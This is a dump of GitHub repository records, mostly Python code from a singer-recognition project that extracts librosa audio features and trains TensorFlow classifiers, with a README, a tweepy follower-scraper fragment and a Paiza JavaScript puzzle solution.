ids = []\n count = 0\n for p in follower_cursor.pages():\n ids.append(p)\n count += len(p)\n print \"At %u\" % count\n \n output = open('follower.pkl', 'wb')\n pickle.dump(ids, output, -1)\n output.close()\n \nexcept tweepy.TweepError:\n print tweepy.TweepError.message\nexcept:\n print sys.exc_info()\n" } ]
4
ritzvik/SingerRecognization
https://github.com/ritzvik/SingerRecognization
9735579b1dcacd4df2d080b98ff42233efe92352
12631367991d6929a958850ab5ff2a1dd9dad394
dea2d1509174824df5420af2445aaf1cfc94e489
refs/heads/master
2021-08-07T18:22:03.581492
2017-11-08T18:07:23
2017-11-08T18:07:23
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6934956908226013, "alphanum_fraction": 0.7077516913414001, "avg_line_length": 30.476634979248047, "blob_id": "101a7ad8df2538ede9fb0db63c58fcea2921d023", "content_id": "da0bfc76012bef85e861c822443e6301b9afa597", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3367, "license_type": "no_license", "max_line_length": 98, "num_lines": 107, "path": "/extract_audio_data.py", "repo_name": "ritzvik/SingerRecognization", "src_encoding": "UTF-8", "text": "#REF : https://aqibsaeed.github.io/2016-09-03-urban-sound-classification-part-1/\n#REF : https://docs.python.org/2/library/multiprocessing.html\n#REF : https://www.tensorflow.org/serving/serving_basic\n\nimport sys\nimport glob\nimport os\nimport librosa\n# import librosa.display\nimport numpy as np \n#import tensorflow as tf \n#import sklearn\nfrom multiprocessing import Process, Queue, Lock\nimport pickle\n\ndef extract_feature(file_name, srate):\n\tprint(file_name)\n\tX, sample_rate = librosa.load(file_name,sr=srate)\n\tstft = np.abs(librosa.stft(X))\n\tmfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=40).T,axis=0)\n\tchroma = np.mean(librosa.feature.chroma_stft(S=stft, sr=sample_rate).T,axis=0)\n\tmel = np.mean(librosa.feature.melspectrogram(X, sr=sample_rate).T,axis=0)\n\tcontrast = np.mean(librosa.feature.spectral_contrast(S=stft, sr=sample_rate,fmin=10).T,axis=0)\n\ttonnetz = np.mean(librosa.feature.tonnetz(y=librosa.effects.harmonic(X),sr=sample_rate).T,axis=0)\n\treturn mfccs,chroma,mel,contrast,tonnetz,get_name(file_name)\n\ndef segregate():\n\ttrain_files =[]\n\ttest_files =[]\n\tfor i,fname in enumerate(os.listdir()):\n\t\tif fname.endswith('.wav'):\n\t\t\tif fname[:2]=='t-':\n\t\t\t\tif fname[-5]=='t':\n\t\t\t\t\ttest_files.append(fname)\n\t\t\telse:\n\t\t\t\ttrain_files.append(fname)\n\treturn train_files,test_files\n\ndef get_name(file_name):\n\tif file_name[:2]=='t-':\n\t\treturn file_name[2:].split('_')[0]\n\telse:\n\t\treturn file_name.split('_')[0]\n\n\ndef return_singer_index(singer_name,singer_names):\n\tif singer_name in singer_names:\n\t\treturn singer_names.index(singer_name)\n\telse:\n\t\tsinger_names.append(singer_name)\n\t\treturn singer_names.index(singer_name)\n\ndef parse_extension(fname, srate, out_q, lock):\n\tlock.acquire()\n\tmfccs,chroma,mel,contrast,tonnetz,sname = extract_feature(fname, srate)\n\tout_q.put([mfccs,chroma,mel,contrast,tonnetz,sname])\n\tlock.release()\n\ndef parse(file_names_list, srate, n_threads, singer_names):\n\tout_q = Queue()\n\tfeatures, labels = np.empty((0,193)), np.empty(0)\n\tlocks = [Lock() for i in range(0,n_threads)]\n\t#\n\tfor i,fname in enumerate(file_names_list):\n\t\tProcess(target=parse_extension, args=(fname,srate,out_q,locks[i%n_threads])).start()\n\t#\n\tfor i in range(0,n_threads):\n\t\tlocks[i].acquire(block=True, timeout=3.0)\n\t#\n\tprint(\"~~~\")\n\tfor i,fname in enumerate(file_names_list):\n\t\ttmp = out_q.get()\n\t\t#mfccs,chroma,mel,contrast,tonnetz,sname = tmp[0],tmp[1],tmp[2],tmp[3],tmp[4],tmp[5]\n\t\text_features = np.hstack(tmp[:-1])\n\t\tfeatures = np.vstack([features,ext_features])\n\t\tlabels = np.append(labels,return_singer_index(tmp[5],singer_names))\n\treturn np.array(features), np.array(labels, dtype=np.int)\n\ndef one_hot_encode(labels):\n\tn_labels = len(labels)\n\tn_unique_labels = len(np.unique(labels))\n\tone_hot_encode = np.zeros((n_labels,n_unique_labels))\n\tone_hot_encode[np.arange(n_labels), labels] = 1\n\treturn one_hot_encode\n\ndef main():\n\tsr_global = 18000\n\ttrain_files,test_files = segregate()\n\t#\n\tsinger_names = []\n\tthreads = int(input('No of threads : '))\n\t#\n\t#\n\tts_features, ts_labels = parse(test_files,sr_global,threads,singer_names)\n\ttr_features, tr_labels = parse(train_files,sr_global,threads,singer_names)\n\t#\n\tts_labels = one_hot_encode(ts_labels)\n\ttr_labels = one_hot_encode(tr_labels)\n\t#\n\tf=open('objs.pkl','wb')\n\tpickle.dump([sr_global,singer_names,tr_features,tr_labels,ts_features,ts_labels],f)\n\tf.close()\n\n\nif __name__=='__main__':\n\tmain()\n\t#" }, { "alpha_fraction": 0.7198975086212158, "alphanum_fraction": 0.7292912006378174, "avg_line_length": 35.59375, "blob_id": "790a307c6e7c9a23c8360c45a1bbbcf16205f29a", "content_id": "c9ef8ee60fa494ce7a83116e7d4f25e05713d115", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1171, "license_type": "no_license", "max_line_length": 152, "num_lines": 32, "path": "/README.md", "repo_name": "ritzvik/SingerRecognization", "src_encoding": "UTF-8", "text": "# SingerRecognization\n\nThis Project aims to recognize singer from audio clips of approximately 12 seconds.\n\nThe Training and Test WAV files should reside in the same folder as the .py files\nThe Project uses TensorFlow and Librosa libraries\nMuch of the audio processing code is took from https://aqibsaeed.github.io/2016-09-03-urban-sound-classification-part-1/\n\nThere are four .py files:\n\n recog.py --> vanilla version\n \n multirecog.py --> multithreaded version (significantly faster)\n \n export_builder.py --> multithreaded version (make model and export)\n \n import_learner.py --> import saved model and run on test data\n \nHow To Run (Train real time and test)??\n\n -> Make sure all the audio files are in the same folder as the .py files.\n \n -> Training Set files should have \\<person name\\>_i.wav format\n \n -> Test Set files should have t-\\<person name\\>_i.wav format\n \n \nHow to export model ??\n\n -> Run export_builder.py. It will train on files of format \\<person name\\>_i.wav and run the model on files of format t-\\<person name\\>_it.wav format.\n \n -> Run import_builder.py. It will run the files of format t-\\<person name\\>_i.wav on exported model.\n" }, { "alpha_fraction": 0.6728048324584961, "alphanum_fraction": 0.6883116960525513, "avg_line_length": 29.16958999633789, "blob_id": "c5bd68cd62ada81c0bedca94ff9e7d3592da838c", "content_id": "377eaaac2bf41a0c8a5a3c65ff9bc49df91fdc62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5159, "license_type": "no_license", "max_line_length": 103, "num_lines": 171, "path": "/multirecog.py", "repo_name": "ritzvik/SingerRecognization", "src_encoding": "UTF-8", "text": "#REF : https://aqibsaeed.github.io/2016-09-03-urban-sound-classification-part-1/\n\n\nimport glob\nimport os\nimport librosa\nimport librosa.display\nimport numpy as np \nimport tensorflow as tf \nimport sklearn\nfrom multiprocessing import Process, Queue, Lock\n\ndef extract_feature(file_name):\n\tprint(file_name)\n\tX, sample_rate = librosa.load(file_name,sr=sr_global)\n\tstft = np.abs(librosa.stft(X))\n\tmfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=40).T,axis=0)\n\tchroma = np.mean(librosa.feature.chroma_stft(S=stft, sr=sample_rate).T,axis=0)\n\tmel = np.mean(librosa.feature.melspectrogram(X, sr=sample_rate).T,axis=0)\n\tcontrast = np.mean(librosa.feature.spectral_contrast(S=stft, sr=sample_rate,fmin=10).T,axis=0)\n\ttonnetz = np.mean(librosa.feature.tonnetz(y=librosa.effects.harmonic(X),sr=sample_rate).T,axis=0)\n\treturn mfccs,chroma,mel,contrast,tonnetz,get_name(file_name)\n\ndef segregate():\n\ttrain_files =[]\n\ttest_files =[]\n\tfor i,fname in enumerate(os.listdir()):\n\t\tif fname.endswith('.wav'):\n\t\t\tif fname[:2]=='t-':\n\t\t\t\ttest_files.append(fname)\n\t\t\telse:\n\t\t\t\ttrain_files.append(fname)\n\treturn train_files,test_files\n\ndef get_name(file_name):\n\tif file_name[:2]=='t-':\n\t\treturn file_name[2:].split('_')[0]\n\telse:\n\t\treturn file_name.split('_')[0]\n\n\ndef return_singer_index(singer_name):\n\tglobal singers; global singer_names;\n\tif singer_name in singer_names:\n\t\treturn singer_names.index(singer_name)\n\telse:\n\t\tsinger_names.append(singer_name)\n\t\tsingers += 1\n\t\treturn singer_names.index(singer_name)\n\ndef parse_extension(fname, out_q, lock):\n\tlock.acquire()\n\tmfccs,chroma,mel,contrast,tonnetz,sname = extract_feature(fname)\n\tout_q.put([mfccs,chroma,mel,contrast,tonnetz,sname])\n\tlock.release()\n\ndef parse(file_names_list):\n\tglobal threads\n\tout_q = Queue()\n\tfeatures, labels = np.empty((0,193)), np.empty(0)\n\tlocks = [Lock() for i in range(0,threads)]\n\t#\n\tfor i,fname in enumerate(file_names_list):\n\t\tProcess(target=parse_extension, args=(fname,out_q,locks[i%threads])).start()\n\t#\n\tfor i in range(0,threads):\n\t\tlocks[i].acquire(block=True)\n\t#\n\tprint(\"~~~\")\n\tfor i,fname in enumerate(file_names_list):\n\t\ttmp = out_q.get()\n\t\t#mfccs,chroma,mel,contrast,tonnetz,sname = tmp[0],tmp[1],tmp[2],tmp[3],tmp[4],tmp[5]\n\t\text_features = np.hstack(tmp[:-1])\n\t\tfeatures = np.vstack([features,ext_features])\n\t\tlabels = np.append(labels,return_singer_index(tmp[5]))\n\treturn np.array(features), np.array(labels, dtype=np.int)\n\ndef one_hot_encode(labels):\n\tn_labels = len(labels)\n\tn_unique_labels = len(np.unique(labels))\n\tone_hot_encode = np.zeros((n_labels,n_unique_labels))\n\tone_hot_encode[np.arange(n_labels), labels] = 1\n\treturn one_hot_encode\n\n\nif __name__=='__main__':\n\tsr_global = 18000\n\t\n\ttrain_files,test_files = segregate()\n\tsingers = 0\n\tsinger_names = []\n\tthreads = int(input('No of threads : '))\n\n\n\tts_features, ts_labels = parse(test_files)\n\ttr_features, tr_labels = parse(train_files)\n\n\ttr_labels = one_hot_encode(tr_labels)\n\tts_labels = one_hot_encode(ts_labels)\n\n\n\n\n\ttraining_epochs = 2000\n\tn_dim = tr_features.shape[1]\n\tn_classes = len(singer_names)\n\tn_hidden_layers = int(input('Give no of Hidden Layers : '))\n\tn_hidden_units_i = [n_dim]\n\n\tfor i in range(0,n_hidden_layers):\n\t\tn_hidden_units_i.append(int(input('Units for Layer %d : '%(i))))\n\n\tsd = 1/np.sqrt(n_dim)\n\tlearning_rate = 0.01\n\n\n\n\tX = tf.placeholder(tf.float32,[None,n_dim])\n\tY = tf.placeholder(tf.float32,[None,n_classes])\n\n\n\tht = X\n\n\tfor i in range(0,n_hidden_layers):\n\t\tW_i = tf.Variable(tf.random_normal([n_hidden_units_i[i],n_hidden_units_i[i+1]], mean = 0, stddev=sd))\n\t\tb_i = tf.Variable(tf.random_normal([n_hidden_units_i[i+1]], mean = 0, stddev=sd))\n\t\tif i%2:\n\t\t\th_i = tf.nn.sigmoid(tf.matmul(ht,W_i) + b_i)\n\t\telse:\n\t\t\th_i = tf.nn.tanh(tf.matmul(ht,W_i) + b_i)\n\t\tht = h_i\n\n\t# W = tf.Variable(tf.random_normal([n_hidden_units_three,n_classes], mean = 0, stddev=sd))\n\tW = tf.Variable(tf.random_normal([n_hidden_units_i[n_hidden_layers],n_classes], mean = 0, stddev=sd))\n\tb = tf.Variable(tf.random_normal([n_classes], mean = 0, stddev=sd))\n\t#y_ = tf.nn.softmax(tf.matmul(h_3,W) + b)\n\ty_ = tf.nn.softmax(tf.matmul(ht,W) + b)\n\n\tinit = tf.initialize_all_variables()\n\n\n\tcost_function = -tf.reduce_sum(Y * tf.log(y_))\n\toptimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost_function)\n\n\tcorrect_prediction = tf.equal(tf.argmax(y_,1), tf.argmax(Y,1))\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\n\n\n\tcost_history = np.empty(shape=[1],dtype=float)\n\ty_true, y_pred = None, None\n\twith tf.Session() as sess:\n\t\tsess.run(init)\n\t\tfor epoch in range(training_epochs):\n\t\t\t_,cost = sess.run([optimizer,cost_function],feed_dict={X:tr_features,Y:tr_labels})\n\t\t\tcost_history = np.append(cost_history,cost)\n\t\t\n\t\ty_pred = sess.run(tf.argmax(y_,1),feed_dict={X: ts_features})\n\t\ty_true = sess.run(tf.argmax(ts_labels,1))\n\t\tprint('Test accuracy: ',round(sess.run(accuracy, feed_dict={X: ts_features, Y: ts_labels}) , 3))\n\n\n\n\n\trelation = [[singer_names[i],i] for i in range(0,len(singer_names))]\n\tprint (relation)\n\tprint (y_true)\n\tprint (y_pred)\n\tp,r,f,s = sklearn.metrics.precision_recall_fscore_support(y_true, y_pred, average='micro')\n\tprint (\"F-Score:\", round(f,3))\n" }, { "alpha_fraction": 0.6762983798980713, "alphanum_fraction": 0.6949952840805054, "avg_line_length": 31.888198852539062, "blob_id": "6c24330abfa664faba0b9223238d7f41cc5c65de", "content_id": "a00b1dcdb6b5b019a522a26c31e32e0a4ab19c9f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5295, "license_type": "no_license", "max_line_length": 102, "num_lines": 161, "path": "/recog.py", "repo_name": "ritzvik/SingerRecognization", "src_encoding": "UTF-8", "text": "#REF : https://aqibsaeed.github.io/2016-09-03-urban-sound-classification-part-1/\n\nimport glob\nimport os\nimport librosa\nimport librosa.display\nimport numpy as np \nimport tensorflow as tf \nimport sklearn\n\nsr_global = 18000\n\ndef extract_feature(file_name):\n\tprint(file_name)\n\tX, sample_rate = librosa.load(file_name,sr=sr_global)\n\tstft = np.abs(librosa.stft(X))\n\tmfccs = np.mean(librosa.feature.mfcc(y=X, sr=sample_rate, n_mfcc=40).T,axis=0)\n\tchroma = np.mean(librosa.feature.chroma_stft(S=stft, sr=sample_rate).T,axis=0)\n\tmel = np.mean(librosa.feature.melspectrogram(X, sr=sample_rate).T,axis=0)\n\tcontrast = np.mean(librosa.feature.spectral_contrast(S=stft, sr=sample_rate,fmin=10).T,axis=0)\n\ttonnetz = np.mean(librosa.feature.tonnetz(y=librosa.effects.harmonic(X),sr=sample_rate).T,axis=0)\n\treturn mfccs,chroma,mel,contrast,tonnetz\n\ndef segregate():\n\ttrain_files =[]\n\ttest_files =[]\n\tfor i,fname in enumerate(os.listdir()):\n\t\tif fname.endswith('.wav'):\n\t\t\tif fname[:2]=='t-':\n\t\t\t\ttest_files.append(fname)\n\t\t\telse:\n\t\t\t\ttrain_files.append(fname)\n\treturn train_files,test_files\n\ntrain_files,test_files = segregate()\n\n# print(train_files)\n# print(test_files)\ndef get_name(file_name):\n\tif file_name[:2]=='t-':\n\t\treturn file_name[2:].split('_')[0]\n\telse:\n\t\treturn file_name.split('_')[0]\n\nsingers = 0\nsinger_names = []\n\ndef return_singer_index(singer_name):\n\tglobal singers; global singer_names;\n\tif singer_name in singer_names:\n\t\treturn singer_names.index(singer_name)\n\telse:\n\t\tsinger_names.append(singer_name)\n\t\tsingers += 1\n\t\treturn singer_names.index(singer_name)\n\ndef parse_audio_files(file_names_list):\n\tfeatures, labels = np.empty((0,193)), np.empty(0)\n\tfor fname in file_names_list:\n\t\tmfccs,chroma,mel,contrast,tonnetz = extract_feature(fname)\n\t\text_features = np.hstack([mfccs,chroma,mel,contrast,tonnetz])\n\t\tfeatures = np.vstack([features,ext_features])\n\t\tlabels = np.append(labels,return_singer_index(get_name(fname)))\n\treturn np.array(features), np.array(labels, dtype=np.int)\n\ndef one_hot_encode(labels):\n\tn_labels = len(labels)\n\tn_unique_labels = len(np.unique(labels))\n\tone_hot_encode = np.zeros((n_labels,n_unique_labels))\n\tone_hot_encode[np.arange(n_labels), labels] = 1\n\treturn one_hot_encode\n\ntr_features, tr_labels = parse_audio_files(train_files)\nts_features, ts_labels = parse_audio_files(test_files)\n\ntr_labels = one_hot_encode(tr_labels)\nts_labels = one_hot_encode(ts_labels)\n\n\n\n\ntraining_epochs = 2000\nn_dim = tr_features.shape[1]\nn_classes = len(singer_names)\nn_hidden_layers = int(input('Give no of Hidden Layers : '))\nn_hidden_units_i = [n_dim]\nfor i in range(0,n_hidden_layers):\n\tn_hidden_units_i.append(int(input('Units for Layer %d : '%(i))))\n# n_hidden_units_one = 52\n# n_hidden_units_two = 56\n# n_hidden_units_three = 60\nsd = 1/np.sqrt(n_dim)\nlearning_rate = 0.01\n\n\n\nX = tf.placeholder(tf.float32,[None,n_dim])\nY = tf.placeholder(tf.float32,[None,n_classes])\n\n# W_1 = tf.Variable(tf.random_normal([n_dim,n_hidden_units_one], mean = 0, stddev=sd))\n# b_1 = tf.Variable(tf.random_normal([n_hidden_units_one], mean = 0, stddev=sd))\n# h_1 = tf.nn.tanh(tf.matmul(X,W_1) + b_1)\n\n# W_2 = tf.Variable(tf.random_normal([n_hidden_units_one,n_hidden_units_two], mean = 0, stddev=sd))\n# b_2 = tf.Variable(tf.random_normal([n_hidden_units_two], mean = 0, stddev=sd))\n# h_2 = tf.nn.sigmoid(tf.matmul(h_1,W_2) + b_2)\n\n# W_3 = tf.Variable(tf.random_normal([n_hidden_units_two,n_hidden_units_three], mean = 0, stddev=sd))\n# b_3 = tf.Variable(tf.random_normal([n_hidden_units_three], mean = 0, stddev=sd))\n# h_3 = tf.nn.sigmoid(tf.matmul(h_2,W_3) + b_3)\n\nht = X\n\nfor i in range(0,n_hidden_layers):\n\tW_i = tf.Variable(tf.random_normal([n_hidden_units_i[i],n_hidden_units_i[i+1]], mean = 0, stddev=sd))\n\tb_i = tf.Variable(tf.random_normal([n_hidden_units_i[i+1]], mean = 0, stddev=sd))\n\tif i%2:\n\t\th_i = tf.nn.sigmoid(tf.matmul(ht,W_i) + b_i)\n\telse:\n\t\th_i = tf.nn.tanh(tf.matmul(ht,W_i) + b_i)\n\tht = h_i\n\n# W = tf.Variable(tf.random_normal([n_hidden_units_three,n_classes], mean = 0, stddev=sd))\nW = tf.Variable(tf.random_normal([n_hidden_units_i[n_hidden_layers],n_classes], mean = 0, stddev=sd))\nb = tf.Variable(tf.random_normal([n_classes], mean = 0, stddev=sd))\n#y_ = tf.nn.softmax(tf.matmul(h_3,W) + b)\ny_ = tf.nn.softmax(tf.matmul(ht,W) + b)\n\ninit = tf.initialize_all_variables()\n\n\ncost_function = -tf.reduce_sum(Y * tf.log(y_))\noptimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost_function)\n\ncorrect_prediction = tf.equal(tf.argmax(y_,1), tf.argmax(Y,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\n\n\ncost_history = np.empty(shape=[1],dtype=float)\ny_true, y_pred = None, None\nwith tf.Session() as sess:\n\tsess.run(init)\n\tfor epoch in range(training_epochs):\n\t\t_,cost = sess.run([optimizer,cost_function],feed_dict={X:tr_features,Y:tr_labels})\n\t\tcost_history = np.append(cost_history,cost)\n\t\n\ty_pred = sess.run(tf.argmax(y_,1),feed_dict={X: ts_features})\n\ty_true = sess.run(tf.argmax(ts_labels,1))\n\tprint('Test accuracy: ',round(sess.run(accuracy, feed_dict={X: ts_features, Y: ts_labels}) , 3))\n\n\n\n\nrelation = [[singer_names[i],i] for i in range(0,len(singer_names))]\nprint (relation)\nprint (y_true)\nprint (y_pred)\np,r,f,s = sklearn.metrics.precision_recall_fscore_support(y_true, y_pred, average='micro')\nprint (\"F-Score:\", round(f,3))\n" }, { "alpha_fraction": 0.6761598587036133, "alphanum_fraction": 0.6903996467590332, "avg_line_length": 24.91666603088379, "blob_id": "db39197e8ca8ac742560abd4fc808dba320f0890", "content_id": "803e6b6a71cf466d48994011227c54400799ab0c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2177, "license_type": "no_license", "max_line_length": 103, "num_lines": 84, "path": "/import_learner.py", "repo_name": "ritzvik/SingerRecognization", "src_encoding": "UTF-8", "text": "#REF : https://aqibsaeed.github.io/2016-09-03-urban-sound-classification-part-1/\n#REF : https://docs.python.org/2/library/multiprocessing.html\n#REF : https://www.tensorflow.org/serving/serving_basic\n#REF : http://cv-tricks.com/tensorflow-tutorial/save-restore-tensorflow-models-quick-complete-tutorial/\n\nimport sys\nimport glob\nimport os\nimport librosa\nimport numpy as np \nimport tensorflow as tf \nimport sklearn\nfrom sklearn import metrics\nfrom multiprocessing import Process, Queue, Lock\nfrom export_builder import parse, one_hot_encode\n\ndef importAdditionalData():\n\tsinger_names = []\n\tF=open('trained/additional.txt')\n\tn=int(F.readline()[:-1])\n\tfor i in range(0,n):\n\t\tsinger_names.append(F.readline()[:-1])\n\tn=int(F.readline()[:-1])\n\tn_hidden_units_i = []\n\tfor i in range(0,n):\n\t\tn_hidden_units_i.append(int(F.readline()[:-1]))\n\t#\n\treturn singer_names,n_hidden_units_i\n\ndef getTestFiles():\n\ttest_files = []\n\tfor i,fname in enumerate(os.listdir()):\n\t\tif fname.startswith('t-') and fname.endswith('.wav'):\n\t\t\ttest_files.append(fname)\n\treturn test_files\n\n\ndef mainprog():\n\t#\n\t#\n\tsinger_names, n_hidden_units_i = importAdditionalData()\n\tsr_global =18000\n\tthreads = int(input('No of threads : '))\n\ttest_files=getTestFiles()\n\t#\n\tts_features, ts_labels = parse(test_files,sr_global,threads,singer_names)\n\tts_labels = one_hot_encode(ts_labels)\n\t#\n\t#\n\t#\n\tn_dim = ts_features.shape[1]\n\tn_classes = len(singer_names)\n\tn_hidden_layers = len(n_hidden_units_i)\n\tn_hidden_units_i.insert(0,n_dim)\n\tsd = 1/np.sqrt(n_dim)\n\t#\n\t#\n\t#\n\tsess = tf.Session()\n\tsaver = tf.train.import_meta_graph('trained/model.meta')\n\tsaver.restore(sess,'trained/model')\n\t#\n\tgraph=tf.get_default_graph()\n\tX = graph.get_tensor_by_name('X:0')\n\tY = graph.get_tensor_by_name('Y:0')\n\top = graph.get_tensor_by_name('y_:0')\n\t#\n\ty_pred = sess.run(tf.argmax(op,1), feed_dict={X: ts_features})\n\ty_true = sess.run(tf.argmax(ts_labels,1))\n\t#\n\t#\n\t#\n\trelation = [[singer_names[i],i] for i in range(0,len(singer_names))]\n\tprint(relation)\n\tprint(y_true)\n\tprint(y_pred)\n\tp,r,f,s = metrics.precision_recall_fscore_support(y_true, y_pred, average='micro')\n\tprint (\"F-Score:\", round(f,3))\n\t#\n\t#\n\nif __name__=='__main__':\n\tmainprog()\n\t#\n" }, { "alpha_fraction": 0.6539297699928284, "alphanum_fraction": 0.6651133894920349, "avg_line_length": 29.37735939025879, "blob_id": "3344be4bab2babfbbbaf5f598b89c8cf5b73f710", "content_id": "515fbf1e9b8e8069db625babb796591f9b8c5a22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3219, "license_type": "no_license", "max_line_length": 120, "num_lines": 106, "path": "/export_model.py", "repo_name": "ritzvik/SingerRecognization", "src_encoding": "UTF-8", "text": "import sys\nimport glob\nimport os\nimport numpy as np\nimport tensorflow as tf \nimport sklearn\nfrom sklearn import metrics\n#from multiprocessing import Process, Queue, Lock\nimport pickle\n\n\ndef exportAdditionalData(singer_names,n_hidden_units_i):\n\t#\n\tF=open('trained/additional.txt','w')\n\tF.write(str(len(singer_names))+'\\n')\n\tfor singer_name in singer_names:\n\t\tF.write(singer_name+'\\n')\n\tF.write(str(len(n_hidden_units_i)-1)+'\\n')\n\tfor units in n_hidden_units_i[1:]:\n\t\tF.write(str(units)+'\\n')\n\tF.close()\n\n\n\ndef main():\n\tvarfile=open('objs.pkl','rb')\n\tsr_global,singer_names,tr_features,tr_labels,ts_features,ts_labels = pickle.load(varfile)\n\tvarfile.close()\n\t#\n\t#\n\ttraining_epochs = 2000\n\tn_dim = tr_features.shape[1]\n\tn_classes = len(singer_names)\n\tn_hidden_layers = int(input('Give no of Hidden Layers : '))\n\tn_hidden_units_i = [n_dim]\n\t#\n\tfor i in range(0,n_hidden_layers):\n\t\tn_hidden_units_i.append(int(input('Units for Layer %d : '%(i))))\n\t#\n\tsd = 1/np.sqrt(n_dim)\n\tlearning_rate = 0.01\n\t#\n\t#\n\t#\n\tX = tf.placeholder(dtype=tf.float32,shape=[None,n_dim],name='X')\n\tY = tf.placeholder(dtype=tf.float32,shape=[None,n_classes],name='Y')\n\t#\n\t#\n\tht = X\n\t#hiddenLayerVars = []\n\t#\n\tfor i in range(0,n_hidden_layers):\n\t\tW_i = tf.Variable(tf.random_normal([n_hidden_units_i[i],n_hidden_units_i[i+1]], mean = 0, stddev=sd),name='Wh_%d'%(i))\n\t\tb_i = tf.Variable(tf.random_normal([n_hidden_units_i[i+1]], mean = 0, stddev=sd),name='bh_%d'%(i))\n\t\tif i%2:\n\t\t\th_i = tf.nn.sigmoid(tf.matmul(ht,W_i) + b_i,name='hh_%d'%(i))\n\t\telse:\n\t\t\th_i = tf.nn.tanh(tf.matmul(ht,W_i) + b_i,name='hh_%d'%(i))\n\t\t#hiddenLayerVars.append([W_i,b_i,h_i])\n\t\tht = h_i\n\n\t# W = tf.Variable(tf.random_normal([n_hidden_units_three,n_classes], mean = 0, stddev=sd))\n\tW = tf.Variable(tf.random_normal([n_hidden_units_i[n_hidden_layers],n_classes], mean = 0, stddev=sd),name='W')\n\tb = tf.Variable(tf.random_normal([n_classes], mean = 0, stddev=sd),name='b')\n\t#y_ = tf.nn.softmax(tf.matmul(h_3,W) + b)\n\ty_ = tf.nn.softmax(tf.matmul(ht,W) + b,name='y_')\n\n\tinit = tf.initialize_all_variables()\n\n\n\tcost_function = -tf.reduce_sum(Y * tf.log(y_))\n\toptimizer = tf.train.GradientDescentOptimizer(learning_rate).minimize(cost_function)\n\n\tcorrect_prediction = tf.equal(tf.argmax(y_,1), tf.argmax(Y,1))\n\taccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\tsaver = tf.train.Saver()\n\n\n\tcost_history = np.empty(shape=[1],dtype=float)\n\ty_true, y_pred = None, None\n\twith tf.Session() as sess:\n\t\tsess.run(init)\n\t\tfor epoch in range(training_epochs):\n\t\t\t_,cost = sess.run([optimizer,cost_function],feed_dict={X:tr_features,Y:tr_labels})\n\t\t\tcost_history = np.append(cost_history,cost)\n\t\t#\n\t\tsaver.save(sess, 'trained/model')\n\t\ty_pred = sess.run(tf.argmax(y_,1),feed_dict={X: ts_features})\n\t\ty_true = sess.run(tf.argmax(ts_labels,1))\n\t\tprint('Test accuracy: ',round(sess.run(accuracy, feed_dict={X: ts_features, Y: ts_labels}) , 3))\n\n\texportAdditionalData(singer_names,n_hidden_units_i)\n\n\trelation = [[singer_names[i],i] for i in range(0,len(singer_names))]\n\tprint (relation)\n\tprint (y_true)\n\tprint (y_pred)\n\tp,r,f,s = metrics.precision_recall_fscore_support(y_true, y_pred, average='micro')\n\tprint (\"F-Score:\", round(f,3))\n\t#\n\t#\n\nif __name__=='__main__':\n\tmain()\n\t#" } ]
6
igarashi02/CompetitionProgramming
https://github.com/igarashi02/CompetitionProgramming
cd28a9e4d97ea056ad3fb1440622ab697812331b
43a3031d41e2630d4f130ee3f81fdfeddd7f29f7
cf06d06ac5ca1a65548bf063d192a9fcbf49b64a
refs/heads/master
2023-02-13T20:28:29.348296
2021-01-15T05:13:51
2021-01-15T05:13:51
236,641,149
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.84375, "alphanum_fraction": 0.84375, "avg_line_length": 9.666666984558105, "blob_id": "34a878f037e7f69a973f7f0b7b8e90812884db97", "content_id": "793313ac5ff4258bc747f5524f3d82aab9d01438", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 32, "license_type": "no_license", "max_line_length": 24, "num_lines": 3, "path": "/README.md", "repo_name": "igarashi02/CompetitionProgramming", "src_encoding": "UTF-8", "text": "# CompetitionProgramming\n\nPaiza\n" }, { "alpha_fraction": 0.5662431716918945, "alphanum_fraction": 0.5762250423431396, "avg_line_length": 21.040000915527344, "blob_id": "df4d9fe66379dcc60ae7b1812a2146746f61b800", "content_id": "ad3aaa1e713277c45a380ff8a1dacb98e9155433", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 1134, "license_type": "no_license", "max_line_length": 69, "num_lines": 50, "path": "/Paiza/JavaScript/B073/main.js", "repo_name": "igarashi02/CompetitionProgramming", "src_encoding": "UTF-8", "text": "process.stdin.resume();\nprocess.stdin.setEncoding('utf8');\n// 自分の得意な言語で\n// Let's チャレンジ!!\n\nvar lines = [];\nvar reader = require('readline').createInterface({\n input: process.stdin,\n output: process.stdout\n});\nreader.on('line', (line) => {\n lines.push(line);\n});\nreader.on('close', () => {\n const n = parseInt(lines[0].split(\" \")[0])\n const m = parseInt(lines[0].split(\" \")[1])\n\n const trees_s = lines[1].split(\" \")\n const trees = trees_s.map(v => parseInt(v));\n\n const check = parseInt(lines[2])\n\n lines.slice(check).forEach(v => {\n const start_end = v.split(\" \")\n const start = parseInt(start_end[0])-1\n const end = parseInt(start_end[1])\n\n const target = trees.slice(start, end)\n\n const sum = target.reduce((prev, current) => {\n return prev+current\n })\n\n const up = m - Math.floor(sum/target.length)\n\n const target_arr = [...Array(end-start).keys()].map(i => i+start)\n target_arr.forEach(v => {\n if(up > 0){\n trees[v] = trees[v] + up\n }\n })\n })\n\n let str = \"\";\n trees.forEach(v => {\n str = str + v + \" \"\n })\n\n console.log(str);\n});\n" }, { "alpha_fraction": 0.5797101259231567, "alphanum_fraction": 0.5990338325500488, "avg_line_length": 17.81818199157715, "blob_id": 